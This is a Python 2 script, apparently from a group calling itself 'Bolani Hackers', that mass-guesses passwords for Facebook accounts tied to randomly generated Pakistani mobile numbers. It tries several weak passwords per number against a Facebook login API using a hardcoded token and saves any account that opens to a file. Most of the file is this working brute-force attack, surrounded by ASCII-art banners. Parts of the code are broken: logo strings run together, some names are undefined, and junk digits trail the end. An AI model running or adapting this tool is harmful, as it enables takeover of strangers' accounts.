  
#!/usr/bin/python2

#coding=utf-8

#The Credit For This Code Goes To Mansoor Khan

#If You Wanna Take Credits For This Code, Please Look Yourself Again...

#Reserved2020
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(10000):

    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('.txt', 'a')

    print(nmbr)

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    time.sleep(1)
    os.system('Then type: python2 boss')

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]

def keluar():
	print 'Thanks.'
	os.sys.exit()

def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(00000.1)
def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;93mPlease Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)


back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"

os.system("clear")
print  """
\033[1;91m__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶___¶¶¶___§§§§§______§§§§§___¶¶¶__
__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶___¶¶¶¶¶§§§§§§§§__§§§§§§§§¶¶¶¶¶__
________¶¶¶___________¶¶¶¶¶¶§§§§§§§§§§§§¶¶¶¶¶¶____
________¶¶¶___________§§§§¶¶¶¶¶¶§§§§§¶¶¶¶¶¶§§§____
________¶¶¶___________§§§§§§¶¶¶¶¶¶¶¶¶¶¶¶¶§§§§§____
________¶¶¶___________§§§§§§§§¶¶¶¶¶¶¶¶§§§§§§§§____
________¶¶¶____________§§§§§§¶¶¶¶¶¶¶¶¶¶§§§§§§_____
________¶¶¶_____________§§§§¶¶¶¶¶§§§¶¶¶¶¶§§§______
________¶¶¶______________§¶¶¶¶¶§§§§§§¶¶¶¶¶§_______
________¶¶¶_____________¶¶¶¶¶¶§§§§§§§§§¶¶¶¶¶¶_____
________¶¶¶___________¶¶¶¶¶__§§§§§§§§§§___¶¶¶¶¶___
__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶___¶¶¶¶¶______§§§§§§_______¶¶¶¶__
__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶___¶¶___________§§___________¶¶__
__________________________________________________
__¶¶¶¶¶¶__¶¶¶¶¶¶¶¶___¶¶¶¶¶¶¶¶¶__¶¶¶¶¶¶¶¶_¶¶¶¶¶¶¶¶_
___¶¶¶¶¶___¶¶¶¶¶¶__¶¶¶¶¶¶_¶¶¶¶¶__¶¶¶¶¶¶¶__¶¶¶¶¶¶¶_
_____¶¶¶____¶¶¶___¶¶¶¶_______¶¶¶__¶¶¶_______¶¶¶___
______¶¶¶__¶¶¶____¶¶¶_________¶¶¶_¶¶¶_______¶¶¶___
_______¶¶¶¶¶¶____¶¶¶__________¶¶¶_¶¶¶_______¶¶¶___
________¶¶¶¶_____¶¶¶__________¶¶¶_¶¶¶_______¶¶¶___
________¶¶¶______¶¶¶¶_________¶¶¶_¶¶¶_______¶¶¶___
________¶¶¶_______¶¶¶________¶¶¶¶_¶¶¶_______¶¶¶___
________¶¶¶________¶¶¶¶____¶¶¶¶¶___¶¶¶_____¶¶¶____
____¶¶¶¶¶¶¶¶¶¶¶_____¶¶¶¶¶¶¶¶¶¶______¶¶¶¶¶¶¶¶¶_____
_____¶¶¶¶¶¶¶¶¶________¶¶¶¶¶¶__________¶¶¶¶¶_______

----------------
\033[1;92m---------------------Zahid Akash--------------------
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••      
\033[1;96mAsan Log Saraiki Sadi Jhok Saraiki..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••      
\033[1;91m____$$$$$$$$$____ 
____$$$$$$$$$____ 
______$$$$$______ 
______$$$$$______ 
______$$$$$______ 
______$$$$$______ 
____$$$$$$$$$____ 
____$$$$$$$$$____ 
_________________ 
_$$$$$$___$$$$$$_ 
$$$$$$$$_$$$$$$$$ 
$$$$$$$$$$$$$$$$$ 
_$$$$$$$$$$$$$$$_ 
___$$$$$$$$$$$___ 
_____$$$$$$$_____ 
_______$$$_______ 
________$________ 
_________________ 
__$$$$$___$$$$$__ 
__$$$$$$_$$$$$$__ 
___$$$$$$$$$$$___ 
_____$$$$$$$_____ 
______$$$$$______ 
______$$$$$______ 
______$$$$$______ 
_________________ 
_____$$$$$$$_____ 
___$$$$$$$$$$$___ 
__$$$$$___$$$$$__ 
__$$$$$___$$$$$__ 
__$$$$$___$$$$$__ 
___$$$$$$$$$$$___ 
_____$$$$$$$_____ 
_________________ 
__$$$$$___$$$$$__ 
__$$$$$___$$$$$__ 
__$$$$$___$$$$$__ 
__$$$$$___$$$$$__ 
__$$$$$$_$$$$$$__ 
___$$$$$$$$$$$___ 
____$$$$$$$$$____
----------------
----------------
 
                    NEEL AHMAAD
\033[1;94m
                     AKU JAN
\033[1;91m
                     ZULFIQAR
\033[1;93m
                     RAZA AHMAD
\033[1;92m
                      BALOCH MAFIA
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••      
\033[1;96m..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••                
\033[1;92m-------------------BOLANI BALOCH--------------------
"""

####Logo####

logo1 = """
\033[1;91m________________________($$$$$$$$$)__________________________
_________________________($$$$$$$)___________________________
_______________________($$$$$$$$$$$)_________________________
__________________________($$$$$)____________________________
_____($)___________________($$$$$)___________________($)______
____($$)___________________($$$$$)___________________($$)_____
___($$)____________________($$$$$)____________________($$)____
__($$)_____________________($$$$$)_____________________($$)___
__($$$)____________________($$$$$)____________________($$$)___
___($$$$)__________________($$$$$)__________________($$$$)____
____($$$$$)________________($$$$$)________________($$$$$)_____
_____($$$$$)_______________($$$$$)_______________($$$$$)______
______($$$$$)____________($$$$$$$$$)____________($$$$$)_______
________($$$$$$$)______($$$$$$$$$$$$$)______($$$$$$$)_________
______($$$$$$$$$$$$$$$$$$$$$$$_$$$$$$$$$$$$$$$$$$$$$$$)______
____________($$$$$$$$$$$$$$$$___$$$$$$$$$$$$$$$$)____________
_______($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$)______
_____________________($$$$$$$$$$$$$$$$$)_____________________
__________________________($$$$$$$)__________________________
________________________($$$$$$$$$$$)________________________
_______________________($$$_______$$$)_______________________
________________________($$$_____$$$)________________________
_____________________($____$$$_$$$____$)_____________________
______________________($$$$$$$^$$$$$$$)______________________
_________________________($$$$^$$$$)_________________________
__________________________($$$^$$$)__________________________
_______________________($__$$$^$$$__$)_______________________
________________________($$$$$^$$$$$)________________________
_________________________($$$$^$$$$)_________________________
____________________($____($$$^$$$)____$)____________________
____________________($$____$$$^$$$____$$)____________________
_____________________($$$$$$$$^$$$$$$$$)_____________________
________________________($$$$$^$$$$$)________________________
__________________________($$$^$$$)__________________________
_________________________($$$$^$$$$)_________________________
________________________($$$$$^$$$$$)________________________
_______________________($$$$$$^$$$$$$)_______________________
_______________________($$$$$$^$$$$$$)_______________________
_______________________($$$$$$^$$$$$$)_______________________
_______________________($$$$$$^$$$$$$)_______________________
_______________________($$$$$$^$$$$$$)_______________________
_______________________($$$$$$^$$$$$$)_______________________
_______________________($$$$$$^$$$$$$)_______________________
_______________________($$$$$$^$$$$$$)_______________________
________________________($$$$$^$$$$$)________________________
________________________($$$$$^$$$$$)________________________
________________________($$$$$^$$$$$)________________________
________________________($$$$$^$$$$$)________________________
________________________($$$$$^$$$$$)________________________
________________________($$$$$^$$$$$)________________________
________________________($$$$$^$$$$$)________________________
________________________($$$$$^$$$$$)________________________
________________________($$$$$^$$$$$)________________________
________________________($$$$$^$$$$$)________________________
_________________________($$$$^$$$$)_________________________
_________________________($$$$^$$$$)_________________________
_________________________($$$$^$$$$)_________________________
_________________________($$$$^$$$$)_________________________
_________________________($$$$^$$$$)_________________________
__________________________($$$^$$$)__________________________
__________________________($$$^$$$)__________________________
__________________________($$$^$$$)__________________________
___________________________($$^$$)___________________________
___________________________($$^$$)___________________________
___________________________($$^$$)___________________________
____________________________($^$)____________________________
____________________________($^$)____________________________
____________________________($$$)____________________________
_____________________________($)_____________________________

----------------

----------------
 
\033[1;91m
\033[1;91m------------------NEEL AHMAD----------------------
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••      
\033[1;96mThe Credit For This Code Goes To Somi..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••      
\033[1;91mDEVOLPER
                     NEEL AHMAD
\033[1;94m
                     ZULFIQAR
\033[1;91m
                     AKU JAN
\033[1;93m    RAZA AHMAD
                    
\033[1;92m   BALOCH BOLANI
                     
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••      
\033[1;96m..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••      
\033[1;95m----------------------------------------
"""
logo2 = """
\033[1;91m______________________¶¶¶¶¶¶¶___________
__________________¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶______
________________¶¶¶___¶¶¶¶¶¶¶___¶¶¶____
_______________¶¶____¶¶__¶__¶¶____¶¶___
______________¶¶____¶¶___¶___¶¶____¶¶___
_____________¶¶____¶¶____¶____¶¶____¶¶___
___¶¶¶¶¶¶¶¶¶¶¶____¶¶_____¶_____¶_____¶¶__
__¶¶________¶_____¶¶_____¶_____¶¶_____¶__
__¶¶¶¶¶_____¶_____¶______¶______¶_____¶__
______¶¶¶¶¶¶¶¶¶¶_¶¶______¶______¶¶__¶¶¶__
____________¶¶¶¶¶¶¶¶¶____¶_____¶¶¶¶¶_¶___
_____________¶_____¶¶¶¶¶¶¶¶¶¶¶¶¶_____¶___
_____________¶____¶¶¶¶_______¶¶¶¶____¶___
_____________¶___¶¶__¶¶_____¶¶__¶¶___¶___
_____________¶___¶_¶¶_¶_____¶_¶¶_¶___¶___
_____________¶___¶_¶¶¶¶_____¶¶¶¶_¶___¶__
_____________¶___¶¶¶¶¶¶_____¶¶¶¶¶¶___¶___
_____________¶__________¶¶___________¶___
_____________¶___¶______¶¶¶______¶___¶__
_____________¶¶__¶¶_____________¶¶__¶¶___
______________¶____¶¶¶_______¶¶¶¶___¶___
______________¶¶_____¶¶¶¶¶¶¶¶¶_____¶____
_______________¶¶¶_______________¶¶_____
_________________¶¶¶___________¶¶¶____
____________________¶¶¶¶¶¶¶¶¶¶¶______
\033[1;97m
\033[1;91m----------------------------------------
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••      
\033[1;96mThe Credit For This Code Goes To NEEL AHMAD..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••      
\033[1;95m«-----------------\033[1;91mKaifu Tricker\033[1;95m-----------------»"""logo5 = """\033[1;91m•───────█████████████████████────████▀─────────────────▀████──███▀───────────────────────▀███─██▀───────────────────────────▀███▀───────────────────────────────▀██─────────────────────────────────██─────────────────────────────────██─────────────────────────────────██───█████─────────────────█████───██──██▓▓▓███─────────────███▓▓▓██──██──██▓▓▓▓▓██───────────██▓▓▓▓▓██──██──██▓▓▓▓▓▓██─────────██▓▓▓▓▓▓██──██▄──████▓▓▓▓██───────██▓▓▓▓████──▄█▀█▄───▀███▓▓▓██─────██▓▓▓███▀───▄█▀──█▄────▀█████▀─────▀█████▀────▄█─▄██───────────▄█─█▄───────────██▄─███───────────██─██───────────███─███───────────────────────────███──▀██──██▀██──█──█──█──██▀██──██▀───▀████▀─██──█──█──█──██─▀████▀────▀██▀──██──█──█──█──██──▀██▀──────────██──█──█──█──██──────────██──█──█──█──██──────────██──█──█──█──██──────────██──█──█──█──██──────────██──█──█──█──██──────────██──█──█──█──██──────────██──█──█──█──██──────────██──█──█──█──██──────────██──█──█──█──██──────────██──█──█──█──██──────────██──█──█──█──██──────────██──█──█──█──██───────────█▄▄█▄▄█▄▄█▄▄█
                     MAFIA GANG
\033[1;94m
                     ZULFIQAR
\033[1;91m
                     AKU JAN
\033[1;93m
                     RAZA AHMAD
\033[1;92m
                      RJ
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••      
\033[1;96mMAFIA GANG Zindabad..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••      
                                                
\033[1;97m---------------------BOLANI Hackers Pakistan-　$$　　　　$$　　$$$$$$　　$$　　　$$
　　$$　　$$　　$$　　　$$　$$　　　$$
　　　$$$$　　　$$　　　$$　$$　　　$$
　　　$$　　　　$$　　　$$　$$　　　$$
　　$$　　　　　　$$$$$$　　　$$$$$$　

　　　$$　　　$$$$$$$$　　$$$$$$$$$$
　　$$　$$　　$$　　　$$　$$　　　　
　$$　　　$$　$$$$$$$$　　$$$$$$$$$$
　$$$$$$$$$$　$$　　$$　　$$　　　　
　$$　　　$$　$$　　　$$　$$$$$$$$$$

　$$　　　　　$$
　$$　　$$　　$$
　$$　$$　$$　$$
　$$$$　　　$$$$
　$$　　　　　$$

　$$$$$$$$$$
　$$　　　　
　$$$$$$$$$$
　$$　　　　
　$$$$$$$$$$

　$$　　　
　$$　　　
　$$　　　
　$$　　　
　$$$$$$$$

 　$$$$$$　　　$$$$$$　　$$　　　　　$$　$$$$$$$$$$
　$$　　　$$　$$　　　$$　$$$$　　　$$$$　$$　　　　
　$$　　　　　$$　　　$$　$$　$$　$$　$$　$$$$$$$$$$
　$$　　　$$　$$　　　$$　$$　　$$　　$$　$$　　　　
　　$$$$$$　　　$$$$$$　　$$　　　　　$$　$$$$$$$$$$



\033[1;95m«-----------------\033[1;91mKaifu Tricker\033[1;95m-----------------»"""logo13 = """\033[1;92m	\033[1;97m :::!~!!!!!:.\033[1;97m .xUHWH!! !!?M88WHX:.\033[1;97m .X*#M@$!! !X!M$$$$$$WWx:.\033[1;97m :!!!!!!?H! :!$!$$$$$$$$$$8X:\033[1;97m !!~ ~:~!! :~!$!#$$$$$$$$$$8X:\033[1;97m :!~::!H!< ~.U$X!?R$$$$$$$$MM!\033[1;97m ~!~!!!!~~ .:XW$$$U!!?$$$$$$RMM!\033[1;97m !:~~~ .:!M"T#$$$$WX??#MRRMMM!\033[1;91m ~?WuxiW*` `"#$$$$8!!!!??!!!\033[1;91m :X- M$$$$ `"T#$T~!8$WUXU~\033[1;91m :%` ~#$$$m: ~!~ ?$$$$$$\033[1;91m :!`.- ~T$$$$8xx. .xWW- ~""##*"\033[1;97m..... -~~\033[1;91m:<` ! ~?T#$$@@W@*?$$ /`\033[1;97mW$@@M!!! .!~~ \033[1;91m!! .:XUW$W!~ `"~: :\033[1;97m#"~~`.:x%`!! \033[1;91m!H: !WM$$$$Ti.: .!WUn+!`\033[1;97m:::~:!!`:X~ .:\033[1;92m ?H.!u "$$$B$$$!W:U!T$$M~\033[1;97m.~~ :X@!.-~ \033[1;92m?@WTWo("*$$$W$TH$! `\033[1;97mWi.~!X$?!-~ : \033[1;92m?$$$B$Wu("**$RM!\033[1;97m$R@i.~~ ! : \033[1;92m~$$$$$B$$en:`` \033[1;97m?MXT@Wx.~ : \033[1;92m~"##*$$$$M~ \033[1;47m \033[1;31mMr Kaifu \033[1;0m \033[1;95m\033[1;95m«-----------------\033[1;91mKaifu Tricker\033[1;95m-----------------»"""logo14 = """
CorrectUsername = "BOLANI"
CorrectPassword = "GANG"

loop = 'true'
while (loop == 'true'):
    username = raw_input("\033[1;97m\x1b[1;91mTool Username \x1b[1;97m»» \x1b[1;97m")
    if (username == CorrectUsername):
    	password = raw_input("\033[1;97m \x1b[1;91mTool Password  \x1b[1;97m» \x1b[1;97m")
        if (password == CorrectPassword):
            print "Logged in successfully as " + username #Dev:love_hacker
	    time.sleep(2)
            loop = 'false'
        else:
            print "\033[1;94mWrong Password"
            os.system('xdg-open')
    else:
        print "\033[1;94mWrong Username"
        os.system('xdg-open')



##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def login():
    os.system('clear')
    print logo1
    print "\033[1;91m[1]\x1b[1;91mSTART ( \033[1;92m NOW)"
    time.sleep(0.05)
    print "\033[1;95m[2]\x1b[1;93mUPDATE (9.0)"
    time.sleep(0.05)
    print '\x1b[1;94m[0]\033[1;91m Exit ( Back)'
    pilih_login()

def pilih_login():
    peak = raw_input("\n\033[1;95mCHOOSE: \033[1;93m")
    if peak =="":
        print "\x1b[1;97mFill In Correctly"
        pilih_login()
    elif peak =="1":
        Zeek()
def Zeek():
    os.system('clear')
    print logo1
    print '\x1b[1;91m[1]  START CLONING'
    time.sleep(0.10)



 
    print '\x1b[1;94m[0] back'
   
    time.sleep(0.05)
    action()

def action():
    peak = raw_input('\n\033[1;97mCHOOSE:\033[1;97m')
    if peak =='':
        print '[!] Fill In Correctly'
        action()
    elif peak =="1":              
        os.system("clear")
        print logo2
        print "Enter any Pakistan Mobile code Number"+'\n'
        print 'Enter any code 1 to 49'
        print 'telenor.jazz.zong.warid'
        try:
            c = raw_input("\033[1;97mCHOOSE : ")
            k="03"
            idlist = ('.txt')
            for line in open(idlist,"r").readlines():
                id.append(line.strip())
        except IOError:
            print ("[!] File Not Found")
            raw_input("\n[ Back ]")
            blackmafiax()
    elif peak =='0':
        login()
    else:
        print '[!] Fill In Correctly'
        action()
    print 50* '\033[1;94m-'
    xxx = str(len(id))
    jalan ('\033[1;91m Total ids number: '+xxx)
    jalan ('\033[1;92mCode you choose: '+c)
    jalan ("\033[1;93mWait A While Start Cracking...")
    jalan ("\033[1;94mTo Stop Process Press Ctrl+z")
    print 50* '\033[1;97m-'
    def main(arg):
        global cpb,oks
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            pass1 = user
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;93m(Enjoy)  ' + k + c + user + '  |  ' + pass1                                       
                okb = open('save/cloned.txt', 'a')
                okb.write(k+c+user+pass1+'\n')
                okb.close()
                oks.append(c+user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\033[1;97m(CP) ' + k + c + user + '  |  ' + pass1
                    cps = open('save/cloned.txt', 'a')
                    cps.write(k+c+user+pass1+'\n')
                    cps.close()
                    cpb.append(c+user+pass1)
                else:
                    pass2 = k + c + user
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;93m(Enjoy)  ' + k + c + user +  '  |  ' + pass2
                        okb = open('save/cloned.txt', 'a')
                        okb.write(k+c+user+pass2+'\n')
                        okb.close()
                        oks.append(c+user+pass2)
                    else:
                        if 'www.facebook.com' in q['error_msg']:
                            print '\033[1;97m(cp) ' + k + c + user + '  |  ' + pass2
                            cps = open('save/cloned.txt', 'a')
                            cps.write(k+c+user+pass2+'\n')
                            cps.close()
                            cpb.append(c+user+pass2)
                        else:
                            pass3="Pakistan123"
                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                            q = json.load(data)
                            if 'access_token' in q:
                                print '\x1b[1;93m(wow)  ' + k + c + user + '  |  ' + pass3
                                okb = open('save/cloned.txt', 'a')
                                okb.write(k+c+user+pass3+'\n')
                                okb.close()
                                oks.append(c+user+pass3)
                            else:
                                if 'www.facebook.com' in q['error_msg']:
                                    print '\033[1;97m(CP) ' + k + c + user + '  |  ' + pass3 
                                    cps = open('save/cloned.txt', 'a')
                                    cps.write(k+c+user+pass3+'\n')
                                    cps.close()
                                    cpb.append(c+user+pass3)
                                else:
                                    pass4="cp"
                                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                    q = json.load(data)
                                    if 'access_token' in q:
                                        print '\x1b[1;93m(opn)  ' + k + c + user + '  |  ' + pass4 
                                        okb = open('save/cloned.txt', 'a')
                                        okb.write(k+c+user+pass4+'\n')
                                        okb.close()
                                        oks.append(c+user+pass4)
                                    else:
                                        if 'www.facebook.com' in q['error_msg']:
                                            print '\033[1;97m(CP) ' + k + c + user + '  |  ' + pass4
                                            cps = open('save/cloned.txt', 'a')
                                            cps.write(k+c+user+pass4+'\n')
                                            cps.close()
                                            cpb.append(c+user+pass4)
                                        else:
                                            pass5="786786"
                                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                            q = json.load(data)
                                            if 'access_token' in q:
                                                print '\x1b[1;93m(opn now)  ' + k + c + user + '  |  ' + pass5
                                                okb = open('save/cloned.txt', 'a')
                                                okb.write(k+c+user+pass5+'\n')
                                                okb.close()
                                                oks.append(c+user+pass5)
                                            else:
                                                if 'www.facebook.com' in q['error_msg']:
                                                    print '\033[1;97m(CP) ' + k + c + user + '  |  ' + pass5 
                                                    cps = open('save/cloned.txt', 'a')
                                                    cps.write(k+c+user+pass5+'\n')
                                                    cps.close()
                                                    cpb.append(c+user+pass5)
                                                                                                                                                                                                                
                                                                                                                                                                                                                
                                                                                                                                                                                                    
                                                                                                                                                                                                            
                                                                                                                                                                                                            


                                                                                                                                                                                                            
                                                                                                                                                                                                                    
                                                                                                                                                                                                            



        except:
            pass
        
    p = ThreadPool(30)
    p.map(main, id)
    print 50* '\033[1;91m-'
    print 'Process Has Been Completed ...'
    print 'Total Online/Offline : '+str(len(oks))+'/'+str(len(cpb))
    print('Cloned Accounts Has Been Saved : save/cloned.txt')
    jalan("Note : Your Offline account Will Open after 10 to 20 days")
    print ''
    print """
    ███
──────────███║║║║║║║███
─────────█║║║║║║║║║║║║║█
────────█║║║║███████║║║║█
───────█║║║║██─────██║║║║█
──────█║║║║██───────██║║║║█
─────█║║║║██─────────██║║║║█
─────█║║║██───────────██║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
────███████───────────███████
───██║║║║║║██────────██║║║║║██
──██║║║║║║║║██──────██║║║║║║║██
─██║║║║║║║║║║██───██║║║║║║║║║║██
██║║║║║║║║║║║║█████║║║║║║║║║║║║██
█║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║█
█║║║║║║║║║║║║║█████║║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
██║║║║║║║║║║║█░░░░░█║║║║║║║║║║║██
██║║║║║║║║║║║║█░░░█║║║║║║║║║║║║██
─██║║║║║║║║║║║█░░░█║║║║║║║║║║║██
──██║║║║║║║║║║█░░░█║║║║║║║║║║██
───██║║║║║║║║║█░░░█║║║║║║║║║██
────██║║║║║║║║█████║║║║║║║║██
─────██║║║║║║║║███║║║║║║║║██
──────██║║║║║║║║║║║║║║║║║██
───────██║║║║║║║║║║║║║║║██
────────██║║║║║║║║║║║║║██
─────────██║║║║║║║║║║║██
──────────██║║║║║║║║║██
───────────██║║║║║║║██
────────────██║║║║║██
─────────────██║║║██
──────────────██║██
───────────────███
───────────────────────▄██▄▄██▄
──────────────────────██████████
──────────────────────▀████████▀
────────────────────────▀████▀
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
──────────────────────▄▄▄████
──────────────────────▀▀▀████
──────────────────────▀▀▀████
──────────────────────▀▀▀████
──────────────────────▄█████▀
\033[1;96mThanks me later
\033[1;95mFb\033[1;97mSOmi
\033[1;95myoutube\033[1;97m"""

    
    raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
    login() 
          
if __name__ == '__main__':
    login()
\033[1;92m0 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 0 9 1 6 7 8 3 5 7 1 8 3 0 1 9 5 0 2 8 6 1 3 0 1 9 0 8 a v d a u k i j u y i j s r 5 k1 4 7 8 8 9 0 b 9 5 d 0 9 4 8 s 8 2 80 1 